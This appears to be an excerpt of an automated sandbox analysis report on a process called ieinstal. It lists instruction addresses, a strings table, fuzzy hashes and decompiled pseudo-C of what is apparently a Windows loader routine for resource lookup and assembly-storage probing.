                                                                                                                0x1e682fd5
                                                                                                                0x1e682fe0
                                                                                                                0x1e682fe9
                                                                                                                0x1e6c26af
                                                                                                                0x1e6c26b0
                                                                                                                0x1e6c26b3
                                                                                                                0x1e6c26b3
                                                                                                                0x1e682ffd
                                                                                                                0x1e683002
                                                                                                                0x1e683008
                                                                                                                0x1e683010
                                                                                                                0x1e683021
                                                                                                                0x1e683024
                                                                                                                0x1e683026
                                                                                                                0x1e683044
                                                                                                                0x1e6c26c4
                                                                                                                0x1e6c26cc
                                                                                                                0x00000000
                                                                                                                0x1e68304a
                                                                                                                0x1e68304a
                                                                                                                0x1e683050
                                                                                                                0x1e683056
                                                                                                                0x1e68305f
                                                                                                                0x1e6c26d6
                                                                                                                0x1e6c26e2
                                                                                                                0x1e6c26e8
                                                                                                                0x1e683065
                                                                                                                0x1e683065
                                                                                                                0x1e683065
                                                                                                                0x1e683067
                                                                                                                0x1e683073
                                                                                                                0x1e683075
                                                                                                                0x1e683081
                                                                                                                0x1e683083
                                                                                                                0x1e68308a
                                                                                                                0x1e683094
                                                                                                                0x1e683095
                                                                                                                0x1e6830a0
                                                                                                                0x1e6830aa
                                                                                                                0x1e6830ab
                                                                                                                0x1e6830b1
                                                                                                                0x1e6830b7
                                                                                                                0x1e6830bc
                                                                                                                0x1e6830c2
                                                                                                                0x1e6830c6
                                                                                                                0x1e6c26f6
                                                                                                                0x1e6c26fa
                                                                                                                0x1e6c2700
                                                                                                                0x1e6c2703
                                                                                                                0x1e6c2714
                                                                                                                0x1e6c2714
                                                                                                                0x1e6c26fa
                                                                                                                0x1e6830ce
                                                                                                                0x1e6c2724
                                                                                                                0x1e6c274e
                                                                                                                0x1e6c2736
                                                                                                                0x1e6c2736
                                                                                                                0x1e6c2741
                                                                                                                0x1e6c2746
                                                                                                                0x00000000
                                                                                                                0x1e6830d4
                                                                                                                0x1e6830d4
                                                                                                                0x1e6830da
                                                                                                                0x1e6830e6
                                                                                                                0x1e6c2760
                                                                                                                0x1e6c2770
                                                                                                                0x1e6c2775
                                                                                                                0x1e6c277b
                                                                                                                0x1e6c2780
                                                                                                                0x1e6c2798
                                                                                                                0x1e6c27a0
                                                                                                                0x1e6c27a0
                                                                                                                0x00000000
                                                                                                                0x1e6c27a0
                                                                                                                0x1e6c2782
                                                                                                                0x00000000
                                                                                                                0x1e6c2782
                                                                                                                0x1e6c2762
                                                                                                                0x1e6c2768
                                                                                                                0x1e6c276b
                                                                                                                0x00000000
                                                                                                                0x1e6830ec
                                                                                                                0x1e6830f8
                                                                                                                0x1e683100
                                                                                                                0x1e683100
                                                                                                                0x1e68310f
                                                                                                                0x1e683110
                                                                                                                0x1e683112
                                                                                                                0x1e683115
                                                                                                                0x1e68311a
                                                                                                                0x1e683129
                                                                                                                0x1e683138
                                                                                                                0x1e68313f
                                                                                                                0x1e683141
                                                                                                                0x1e683143
                                                                                                                0x1e683143
                                                                                                                0x1e68314b
                                                                                                                0x1e683159
                                                                                                                0x1e683159
                                                                                                                0x1e68315e
                                                                                                                0x1e683160
                                                                                                                0x1e68318d
                                                                                                                0x1e68318d
                                                                                                                0x00000000
                                                                                                                0x1e683160
                                                                                                                0x1e6830e6
                                                                                                                0x1e6830ce
                                                                                                                0x1e683044
                                                                                                                0x1e682fbe

                                                                                                                Strings
                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 1E6C2738
                                                                                                                • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 1E6C27BB
                                                                                                                • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 1E6C27B6
                                                                                                                • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 1E6C268B
                                                                                                                • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 1E6C2660
                                                                                                                • @, xrefs: 1E6830A0
                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 1E6C26BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                                                                • API String ID: 0-541586583
                                                                                                                • Opcode ID: 7f3ec7248e7a95f16044f8f939a31766372704e987d3837aad4b9afd1ae381fc
                                                                                                                • Instruction ID: c6fca021dc351c9aef47ee74d5eec6ebb7253e02a2ddd1293e639a71cafb82a2
                                                                                                                • Opcode Fuzzy Hash: 7f3ec7248e7a95f16044f8f939a31766372704e987d3837aad4b9afd1ae381fc
                                                                                                                • Instruction Fuzzy Hash: 5DC1F375D41729DBDB208F55CC88BAAB7B5EF45B10F9042E9E84CA7250E734AE80CF64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E65AD00 Relevance: 8.1, Strings: 6, Instructions: 573COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E1E65AD00(signed int __ecx, signed int __edx, signed int _a4, signed int* _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, char** _a28) {
				char _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				short _v204;
				short _v720;
				signed short _v724;
				void* _v725;
				signed int _v732;
				char _v733;
				char _v734;
				char _v735;
				char _v736;
				signed int _v740;
				void* _v744;
				signed int _v748;
				signed int _v752;
				signed int _v756;
				signed int _v760;
				void* _v764;
				char* _v768;
				char _v772;
				signed int _v776;
				signed int _v780;
				char** _v784;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v800;
				signed int _v804;
				signed int _v808;
				signed int _v812;
				char _v816;
				signed int _v820;
				char* _v832;
				short _v834;
				signed short _v836;
				char* _v840;
				char _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t243;
				signed int _t244;
				signed int* _t251;
				signed char* _t252;
				signed int _t253;
				signed char* _t254;
				signed int* _t259;
				signed char* _t260;
				signed int _t261;
				signed char* _t262;
				signed int _t271;
				signed int _t285;
				intOrPtr _t288;
				signed int _t292;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed short _t299;
				signed int _t303;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr* _t325;
				intOrPtr _t326;
				signed char _t328;
				signed int _t331;
				signed int _t334;
				signed int _t340;
				void* _t341;
				signed int* _t343;
				signed int _t345;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				intOrPtr* _t358;
				char* _t378;
				char* _t379;
				signed int _t380;
				signed int _t382;
				void* _t383;
				signed int _t384;
				signed int _t385;
				signed int _t387;
				void* _t388;
				void* _t389;
				signed int _t390;
				void* _t391;
				intOrPtr _t392;
				signed int _t410;
				void* _t415;

				_push(0xfffffffe);
				_push(0x1e72bf60);
				_push(E1E69AD20);
				_push( *[fs:0x0]);
				_t392 = _t391 - 0x338;
				_t243 =  *0x1e74b370;
				_v12 = _v12 ^ _t243;
				_t244 = _t243 ^ _t390;
				_v32 = _t244;
				_push(_t244);
				 *[fs:0x0] =  &_v20;
				_v28 = _t392;
				_v760 = __edx;
				_v748 = __ecx;
				_t343 = _a8;
				_v752 = _t343;
				_v776 = _a16;
				_v812 = _a20;
				_v820 = _a24;
				_v784 = _a28;
				_v744 = 0;
				_v800 = 0;
				_v796 = 0;
				_v792 = 0;
				_v788 = 0;
				_v733 = 0;
				_t340 = _a4;
				if((_t340 & 0x00000040) != 0) {
					_v734 = 1;
				} else {
					_v734 = 0;
				}
				_v735 = 0;
				_v736 = 0;
				_v772 = 0x4c004a;
				_v768 = L"LdrpResSearchResourceMappedFile Enter";
				_v844 = 0x4a0048;
				_v840 = L"LdrpResSearchResourceMappedFile Exit";
				_t251 =  *( *[fs:0x30] + 0x50);
				if(_t251 != 0) {
					__eflags =  *_t251;
					if(__eflags == 0) {
						goto L3;
					}
					_t252 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					goto L4;
				} else {
					L3:
					_t252 = 0x7ffe0385;
					L4:
					if(( *_t252 & 0x00000001) != 0) {
						_t253 = E1E663C40();
						__eflags = _t253;
						if(_t253 == 0) {
							_t254 = 0x7ffe0384;
						} else {
							_t254 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E1E6DFC01( &_v772,  *_t254 & 0x000000ff);
						_t343 = _v752;
					}
					_t387 = 0;
					_v756 = 0;
					_t382 = 0;
					if(_t340 < 0) {
						_t387 = 0x80;
						_v756 = 0x80;
					}
					_t371 = _a12;
					if(_t371 != 3) {
						_t345 = _v733;
						goto L10;
					} else {
						_t382 = _t343[2] & 0x0000ffff;
						_v8 = 0;
						_t333 =  *_t343;
						if(( *_t343 & 0xffff0000) != 0) {
							_t334 = E1E6979A0(_t333, L"MUI");
							_t392 = _t392 + 8;
							__eflags = _t334;
							if(__eflags != 0) {
								goto L8;
							}
							_t345 = 1;
							L9:
							_v733 = _t345;
							_v8 = 0xfffffffe;
							_t371 = _a12;
							L10:
							if((_t340 & 0x00000010) != 0 || _t371 - 1 > 2) {
								L21:
								if((_t387 & 0x00060000) == 0x60000) {
									_v732 = 0xc000008a;
									goto L51;
								}
								_t352 =  !_t387;
								_t271 =  !_t340;
								_t410 = _t271 & 0x00000010;
								asm("bt ecx, 0x13");
								asm("bt ecx, 0x11");
								_t371 = (_t371 & 0xffffff00 | _t410 != 0x00000000) & (_t271 & 0xffffff00 | _t410 > 0x00000000) & ((_t271 & 0xffffff00 | _t410 > 0x00000000) & 0xffffff00 | _t410 > 0x00000000);
								_v725 = _t410 != 0;
								_v724 = 1;
								_v720 = 0;
								if(_t371 != 0 || _a12 == 3) {
									if((_t340 & 0x00000010) != 0) {
										__eflags = _t340 & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										}
										goto L27;
									}
									L25:
									if((_t340 & 0x00000004) != 0) {
										_t387 = _t387 | 0x00000004;
										_v756 = _t387;
									}
									_t371 = _v760;
									_t352 = _v748;
									_t415 = E1E65A2E0(_t352, _v760, _t382, _t387,  &_v724);
									if(_t415 < 0) {
										__eflags = _t340 & 0x00001000;
										if(__eflags != 0) {
											goto L55;
										}
									}
									goto L27;
								} else {
									L27:
									asm("bt eax, 0x12");
									asm("bt esi, 0x13");
									if(((( !_t387 & 0xffffff00 | _t415 >= 0x00000000) & 0xffffff00 | (_t340 & 0x00000010) == 0x00000000) & (_t352 & 0xffffff00 | _t415 >= 0x00000000) & ( !_t387 & 0xffffff00 | _t415 >= 0x00000000)) == 0) {
										_push( &_v792);
										_push( &_v800);
										_push(_t340);
										_push(_v760);
										_push(_v748);
										_t264 = E1E65B360(_t340, _t382, _t387, __eflags);
										__eflags = _t264;
										if(_t264 >= 0) {
											goto L28;
										}
										goto L55;
									}
									L28:
									_t355 = _v725;
									L29:
									while(1) {
										if((_t387 & 0x00020000) != 0) {
											_t355 = 0;
											_v725 = 0;
										}
										_t384 = 0;
										_v732 = 0;
										_v740 = 0;
										_v764 = 0;
										_t371 = 0;
										while(1) {
											_v780 = _t371;
											if(_t371 >= (_v724 & 0x0000ffff)) {
												break;
											}
											if(_t355 != 0) {
												_v744 = 0;
												_v740 = 0;
												_t371 =  *(_t390 + _t371 * 8 - 0x2cc) & 0x0000ffff;
												_t288 =  *((intOrPtr*)(_t390 + _v780 * 8 - 0x2c8));
												__eflags = _t371;
												if(_t371 != 0) {
													__eflags = _t288 - 0xa;
													if(_t288 == 0xa) {
														_t384 = 0xc000000d;
														_v732 = 0xc000000d;
														L74:
														_t371 = _v780 + 1;
														continue;
													}
													_v764 = _t371;
													__eflags = _t355;
													if(__eflags == 0) {
														goto L33;
													}
													_push(_t387 | 0x00001000);
													_push( &_v740);
													_push( &_v744);
													_push(_v764);
													_push(_v748);
													_t384 = E1E65BDE0(_t340, _t384, _t387, __eflags);
													_v732 = _t384;
													__eflags = _t384;
													if(_t384 < 0) {
														__eflags = _t384 - 0xc0000034;
														if(_t384 == 0xc0000034) {
															L117:
															_t384 = 0xc00b0001;
															_v732 = 0xc00b0001;
															L130:
															_t355 = _v725;
															goto L74;
														}
														__eflags = _t384 - 0xc000003a;
														if(_t384 != 0xc000003a) {
															goto L130;
														}
														goto L117;
													}
													_v735 = 1;
													__eflags = _v740;
													if(__eflags == 0) {
														_push(1);
														_push(0x200);
														_push( &_v740);
														_push(_v744);
														_t384 = E1E65AB70(_t340, _t384, _t387, __eflags);
														_v732 = _t384;
													}
													__eflags = _t340 & 0x00001000;
													if(__eflags == 0) {
														L82:
														_push( &_v788);
														_push( &_v796);
														_push(_t340);
														_push(_v740);
														_push(_v744);
														_t384 = E1E65B360(_t340, _t384, _t387, __eflags);
														_v732 = _t384;
														_t355 = _v725;
														__eflags = _t384;
														if(_t384 >= 0) {
															goto L33;
														}
														goto L74;
													} else {
														__eflags = _t384;
														if(__eflags < 0) {
															L48:
															_t355 = _v725;
															break;
														}
														goto L82;
													}
												}
												__eflags = _t288 - 2;
												if(_t288 != 2) {
													_t384 = 0xc000000d;
													_v732 = 0xc000000d;
												}
												goto L74;
											}
											L33:
											_v816 = 0;
											_t292 = (0 | _t355 != 0x00000000) - 0x00000001 &  &_v764;
											if(_t355 != 0) {
												_v804 = _t340 | 0x00000020;
											} else {
												_v804 = _t340;
											}
											_t378 = _v812;
											if(_t378 == 0) {
												_t378 =  &_v816;
											}
											_v808 = _t378;
											if(_t355 != 0) {
												_t379 = _v788;
											} else {
												_t379 = _v792;
											}
											_v768 = _t379;
											if(_t355 != 0) {
												_t385 = _v796;
											} else {
												_t385 = _v800;
											}
											if(_t355 != 0) {
												_t380 = _v740;
											} else {
												_t380 = _v760;
											}
											if(_t355 != 0) {
												_t356 = _v744;
											} else {
												_t356 = _v748;
											}
											_t371 = 0;
											_t384 = E1E65E9A0(_t356, 0, _t380, _t385, _v768, 0, _v752, _a12,  &_v724, _v776, _v808, _v804, _t292);
											_v732 = _t384;
											if(_v734 != 0) {
												_t296 =  !_t387;
												__eflags = _t296 & 0x00040000;
												if((_t296 & 0x00040000) == 0) {
													goto L45;
												}
												_t297 = _v725;
												__eflags = _t384;
												if(_t384 < 0) {
													goto L58;
												}
												_t371 = _v776;
												__eflags = _t371;
												if(_t371 == 0) {
													goto L46;
												}
												__eflags = _t297;
												if(_t297 == 0) {
													goto L46;
												}
												_t310 = _v812;
												__eflags = _t310;
												if(_t310 == 0) {
													_t311 = _v816;
												} else {
													_t311 =  *_t310;
												}
												_t384 = E1E65872A(_v744, _t371, _t311,  *((intOrPtr*)(_v752 + 0xc)), 1);
												_v732 = _t384;
												__eflags = _t384;
												if(_t384 < 0) {
													 *_v776 = 0;
													__eflags = _t384 - 0xc000007b;
													if(_t384 == 0xc000007b) {
														goto L51;
													}
												}
												goto L45;
											} else {
												L45:
												_t297 = _v725;
												L46:
												if(_t384 < 0) {
													L58:
													__eflags = _t297;
													if(__eflags != 0) {
														_t371 = _v760;
														_t298 = E1E6E30EE(_t340, _v748, _v760, _t384, __eflags, _v744, _v740);
														__eflags = _t298;
														if(_t298 != 0) {
															goto L48;
														}
														goto L130;
													}
													__eflags = _t384;
													if(_t384 < 0) {
														goto L48;
													}
												}
												_t358 = _v784;
												if(_t358 != 0) {
													_t299 = _v764;
													__eflags = _t299;
													if(_t299 != 0) {
														_v832 =  &_v204;
														_v834 = 0xac;
														_t384 = E1E675A40(_t371, _t299 & 0x0000ffff,  &_v836, 2, 0);
														_v732 = _t384;
														__eflags = _t384;
														if(_t384 < 0) {
															goto L51;
														}
														_t303 = (_v836 & 0x0000ffff) >> 1;
														__eflags = _t303;
														_t358 = _v784;
														L135:
														_v768 = _t303;
														_v8 = 1;
														__eflags = _t303 -  *_t358;
														if(_t303 >=  *_t358) {
															L138:
															 *_t358 = _t303 + 1;
															_v732 = 0xc0000023;
															_v8 = 0xfffffffe;
															goto L51;
														}
														_t371 = _v820;
														__eflags = _t371;
														if(_t371 == 0) {
															goto L138;
														}
														_t389 = _t303 + _t303;
														E1E6988C0(_t371,  &_v204, _t389);
														_t392 = _t392 + 0xc;
														 *_v784 =  &(_v768[1]);
														 *((short*)(_t389 + _v820)) = 0;
														_v8 = 0xfffffffe;
														_t387 = _v756;
														goto L48;
													}
													_t303 = 0;
													_v204 = 0;
													goto L135;
												}
												goto L48;
											}
										}
										if(_t355 != 0) {
											__eflags = _t340 & 0x00200000;
											if((_t340 & 0x00200000) == 0) {
												_t371 = _v740;
												E1E650C12(_v744, _v740, _v752, _a12);
												_t355 = _v725;
											}
										}
										if(_t384 < 0) {
											__eflags = _t355;
											if(_t355 != 0) {
												__eflags = _v736;
												if(_v736 != 0) {
													L143:
													__eflags = _t387 & 0x00040000;
													if((_t387 & 0x00040000) != 0) {
														_t355 = 0;
														_v725 = 0;
													} else {
														_t387 = _t387 | 0x00020000;
														_v756 = _t387;
													}
													goto L62;
												}
												__eflags = _v735;
												if(_v735 != 0) {
													goto L143;
												}
												_t285 = L1E6487E0(_v748);
												_t355 = _v725;
												__eflags = _t285;
												if(_t285 < 0) {
													goto L143;
												}
												_t387 = _t387 | 0x00400000;
												_v756 = _t387;
												_v736 = 1;
											}
											L62:
											__eflags = _t384;
											if(_t384 >= 0) {
												goto L51;
											}
											__eflags = _t355;
											if(_t355 == 0) {
												goto L51;
											}
											continue;
										} else {
											goto L51;
										}
									}
								}
							} else {
								_t325 = _v752;
								if(_t371 != 3) {
									_t371 = 0;
								} else {
									_t371 =  *(_t325 + 8) & 0x0000ffff;
								}
								if((_t340 & 0x01000000) != 0) {
									_t340 = _t340 | 0x00000010;
									goto L21;
								} else {
									_t326 =  *_t325;
									if(_t326 != 0x10) {
										__eflags = _t326 - 0x18;
										if(__eflags == 0) {
											goto L16;
										}
										__eflags = _t345;
										if(__eflags == 0) {
											L17:
											_push(1);
											_push(_t340);
											_push(0);
											_push(_v760);
											_push(_v748);
											_t331 = E1E65B5E0(_t340, _t382, _t387, _t405);
											_v732 = _t331;
											if(_t331 >= 0) {
												_t371 = _v752;
												_t387 = _t387 | E1E658160(_v748, _t371, _t345, _t340);
												L20:
												_v756 = _t387;
												goto L21;
											}
											if(_t331 != 0xc000008a) {
												L51:
												_t259 =  *( *[fs:0x30] + 0x50);
												if(_t259 != 0) {
													__eflags =  *_t259;
													if( *_t259 == 0) {
														goto L52;
													}
													_t260 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													L53:
													if(( *_t260 & 0x00000001) != 0) {
														_t261 = E1E663C40();
														__eflags = _t261;
														if(_t261 == 0) {
															_t262 = 0x7ffe0384;
														} else {
															_t262 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
														}
														_t371 =  *_t262 & 0x000000ff;
														E1E6DFC01( &_v844,  *_t262 & 0x000000ff);
													}
													_t264 = _v732;
													L55:
													 *[fs:0x0] = _v20;
													_pop(_t383);
													_pop(_t388);
													_pop(_t341);
													return E1E694B50(_t264, _t341, _v32 ^ _t390, _t371, _t383, _t388);
												}
												L52:
												_t260 = 0x7ffe0385;
												goto L53;
											}
											_t387 = _t387 | 0x00080000;
											goto L20;
										}
									}
									L16:
									_t328 =  !_t340;
									_t405 = _t328 & 0x00000008;
									if((_t328 & 0x00000008) != 0) {
										__eflags = _t371;
										if(__eflags != 0) {
											__eflags = _t371 - 0x400;
											if(__eflags == 0) {
												goto L70;
											}
											__eflags = _t371 - 0x800;
											if(__eflags != 0) {
												goto L17;
											}
										}
										L70:
										_t340 = _t340 | 0x00000010;
										goto L21;
									}
									goto L17;
								}
							}
						}
						L8:
						_t345 = 0;
						goto L9;
					}
				}
			}
































































































                                                                                                                0x1e65ad05
                                                                                                                0x1e65ad07
                                                                                                                0x1e65ad0c
                                                                                                                0x1e65ad17
                                                                                                                0x1e65ad18
                                                                                                                0x1e65ad1e
                                                                                                                0x1e65ad23
                                                                                                                0x1e65ad26
                                                                                                                0x1e65ad28
                                                                                                                0x1e65ad2e
                                                                                                                0x1e65ad32
                                                                                                                0x1e65ad38
                                                                                                                0x1e65ad3b
                                                                                                                0x1e65ad41
                                                                                                                0x1e65ad47
                                                                                                                0x1e65ad4a
                                                                                                                0x1e65ad53
                                                                                                                0x1e65ad5c
                                                                                                                0x1e65ad65
                                                                                                                0x1e65ad6e
                                                                                                                0x1e65ad74
                                                                                                                0x1e65ad7e
                                                                                                                0x1e65ad88
                                                                                                                0x1e65ad92
                                                                                                                0x1e65ad9c
                                                                                                                0x1e65ada6
                                                                                                                0x1e65adad
                                                                                                                0x1e65adb3
                                                                                                                0x1e6b3164
                                                                                                                0x1e65adb9
                                                                                                                0x1e65adb9
                                                                                                                0x1e65adb9
                                                                                                                0x1e65adc0
                                                                                                                0x1e65adc7
                                                                                                                0x1e65adce
                                                                                                                0x1e65add8
                                                                                                                0x1e65ade2
                                                                                                                0x1e65adec
                                                                                                                0x1e65adfc
                                                                                                                0x1e65ae01
                                                                                                                0x1e6b3170
                                                                                                                0x1e6b3173
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b3182
                                                                                                                0x00000000
                                                                                                                0x1e65ae07
                                                                                                                0x1e65ae07
                                                                                                                0x1e65ae07
                                                                                                                0x1e65ae0c
                                                                                                                0x1e65ae0f
                                                                                                                0x1e6b318c
                                                                                                                0x1e6b3191
                                                                                                                0x1e6b3193
                                                                                                                0x1e6b31a5
                                                                                                                0x1e6b3195
                                                                                                                0x1e6b319e
                                                                                                                0x1e6b319e
                                                                                                                0x1e6b31b3
                                                                                                                0x1e6b31b8
                                                                                                                0x1e6b31b8
                                                                                                                0x1e65ae15
                                                                                                                0x1e65ae17
                                                                                                                0x1e65ae1d
                                                                                                                0x1e65ae21
                                                                                                                0x1e6b31c3
                                                                                                                0x1e6b31c8
                                                                                                                0x1e6b31c8
                                                                                                                0x1e65ae27
                                                                                                                0x1e65ae2d
                                                                                                                0x1e65b166
                                                                                                                0x00000000
                                                                                                                0x1e65ae33
                                                                                                                0x1e65ae33
                                                                                                                0x1e65ae37
                                                                                                                0x1e65ae3e
                                                                                                                0x1e65ae45
                                                                                                                0x1e65b336
                                                                                                                0x1e65b33b
                                                                                                                0x1e65b33e
                                                                                                                0x1e65b340
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65b346
                                                                                                                0x1e65ae4d
                                                                                                                0x1e65ae4d
                                                                                                                0x1e65ae53
                                                                                                                0x1e65ae5a
                                                                                                                0x1e65ae5d
                                                                                                                0x1e65ae60
                                                                                                                0x1e65aedb
                                                                                                                0x1e65aee7
                                                                                                                0x1e6b3231
                                                                                                                0x00000000
                                                                                                                0x1e6b3231
                                                                                                                0x1e65aeef
                                                                                                                0x1e65aef3
                                                                                                                0x1e65aef5
                                                                                                                0x1e65aefa
                                                                                                                0x1e65af03
                                                                                                                0x1e65af0a
                                                                                                                0x1e65af0c
                                                                                                                0x1e65af18
                                                                                                                0x1e65af21
                                                                                                                0x1e65af2a
                                                                                                                0x1e65af35
                                                                                                                0x1e65b17c
                                                                                                                0x1e65b17f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65b185
                                                                                                                0x1e65af3b
                                                                                                                0x1e65af3e
                                                                                                                0x1e6b3240
                                                                                                                0x1e6b3243
                                                                                                                0x1e6b3243
                                                                                                                0x1e65af4d
                                                                                                                0x1e65af53
                                                                                                                0x1e65af5e
                                                                                                                0x1e65af60
                                                                                                                0x1e6b324e
                                                                                                                0x1e6b3254
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b325a
                                                                                                                0x00000000
                                                                                                                0x1e65af66
                                                                                                                0x1e65af66
                                                                                                                0x1e65af6a
                                                                                                                0x1e65af71
                                                                                                                0x1e65af82
                                                                                                                0x1e65b110
                                                                                                                0x1e65b117
                                                                                                                0x1e65b118
                                                                                                                0x1e65b119
                                                                                                                0x1e65b11f
                                                                                                                0x1e65b125
                                                                                                                0x1e65b12a
                                                                                                                0x1e65b12c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65b132
                                                                                                                0x1e65af88
                                                                                                                0x1e65af88
                                                                                                                0x00000000
                                                                                                                0x1e65af90
                                                                                                                0x1e65af96
                                                                                                                0x1e6b325f
                                                                                                                0x1e6b3261
                                                                                                                0x1e6b3261
                                                                                                                0x1e65af9c
                                                                                                                0x1e65af9e
                                                                                                                0x1e65afa4
                                                                                                                0x1e65afac
                                                                                                                0x1e65afb3
                                                                                                                0x1e65afb5
                                                                                                                0x1e65afb5
                                                                                                                0x1e65afc4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65afcc
                                                                                                                0x1e65b19b
                                                                                                                0x1e65b1a5
                                                                                                                0x1e65b1af
                                                                                                                0x1e65b1bd
                                                                                                                0x1e65b1c4
                                                                                                                0x1e65b1c7
                                                                                                                0x1e65b1ff
                                                                                                                0x1e65b202
                                                                                                                0x1e6b326c
                                                                                                                0x1e6b3271
                                                                                                                0x1e65b1d9
                                                                                                                0x1e65b1df
                                                                                                                0x00000000
                                                                                                                0x1e65b1df
                                                                                                                0x1e65b208
                                                                                                                0x1e65b20f
                                                                                                                0x1e65b211
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65b21e
                                                                                                                0x1e65b225
                                                                                                                0x1e65b22c
                                                                                                                0x1e65b22d
                                                                                                                0x1e65b233
                                                                                                                0x1e65b23e
                                                                                                                0x1e65b240
                                                                                                                0x1e65b246
                                                                                                                0x1e65b248
                                                                                                                0x1e6b327c
                                                                                                                0x1e6b3282
                                                                                                                0x1e6b3290
                                                                                                                0x1e6b3290
                                                                                                                0x1e6b3295
                                                                                                                0x1e6b3378
                                                                                                                0x1e6b3378
                                                                                                                0x00000000
                                                                                                                0x1e6b3378
                                                                                                                0x1e6b3284
                                                                                                                0x1e6b328a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b328a
                                                                                                                0x1e65b24e
                                                                                                                0x1e65b255
                                                                                                                0x1e65b25c
                                                                                                                0x1e6b32a0
                                                                                                                0x1e6b32a2
                                                                                                                0x1e6b32ad
                                                                                                                0x1e6b32ae
                                                                                                                0x1e6b32b9
                                                                                                                0x1e6b32bb
                                                                                                                0x1e6b32bb
                                                                                                                0x1e65b262
                                                                                                                0x1e65b268
                                                                                                                0x1e65b272
                                                                                                                0x1e65b278
                                                                                                                0x1e65b27f
                                                                                                                0x1e65b280
                                                                                                                0x1e65b281
                                                                                                                0x1e65b287
                                                                                                                0x1e65b292
                                                                                                                0x1e65b294
                                                                                                                0x1e65b29a
                                                                                                                0x1e65b2a0
                                                                                                                0x1e65b2a2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65b26a
                                                                                                                0x1e65b26a
                                                                                                                0x1e65b26c
                                                                                                                0x1e65b0b1
                                                                                                                0x1e65b0b1
                                                                                                                0x00000000
                                                                                                                0x1e65b0b1
                                                                                                                0x00000000
                                                                                                                0x1e65b26c
                                                                                                                0x1e65b268
                                                                                                                0x1e65b1c9
                                                                                                                0x1e65b1cc
                                                                                                                0x1e65b1ce
                                                                                                                0x1e65b1d3
                                                                                                                0x1e65b1d3
                                                                                                                0x00000000
                                                                                                                0x1e65b1cc
                                                                                                                0x1e65afd2
                                                                                                                0x1e65afd2
                                                                                                                0x1e65afea
                                                                                                                0x1e65afee
                                                                                                                0x1e65b2b2
                                                                                                                0x1e65aff4
                                                                                                                0x1e65aff4
                                                                                                                0x1e65aff4
                                                                                                                0x1e65affa
                                                                                                                0x1e65b002
                                                                                                                0x1e65b171
                                                                                                                0x1e65b171
                                                                                                                0x1e65b008
                                                                                                                0x1e65b010
                                                                                                                0x1e65b2bd
                                                                                                                0x1e65b016
                                                                                                                0x1e65b016
                                                                                                                0x1e65b016
                                                                                                                0x1e65b01c
                                                                                                                0x1e65b024
                                                                                                                0x1e65b2c8
                                                                                                                0x1e65b02a
                                                                                                                0x1e65b02a
                                                                                                                0x1e65b02a
                                                                                                                0x1e65b032
                                                                                                                0x1e65b2d3
                                                                                                                0x1e65b038
                                                                                                                0x1e65b038
                                                                                                                0x1e65b038
                                                                                                                0x1e65b040
                                                                                                                0x1e65b2de
                                                                                                                0x1e65b046
                                                                                                                0x1e65b046
                                                                                                                0x1e65b046
                                                                                                                0x1e65b079
                                                                                                                0x1e65b080
                                                                                                                0x1e65b082
                                                                                                                0x1e65b08f
                                                                                                                0x1e6b32c8
                                                                                                                0x1e6b32ca
                                                                                                                0x1e6b32cf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b32d5
                                                                                                                0x1e6b32db
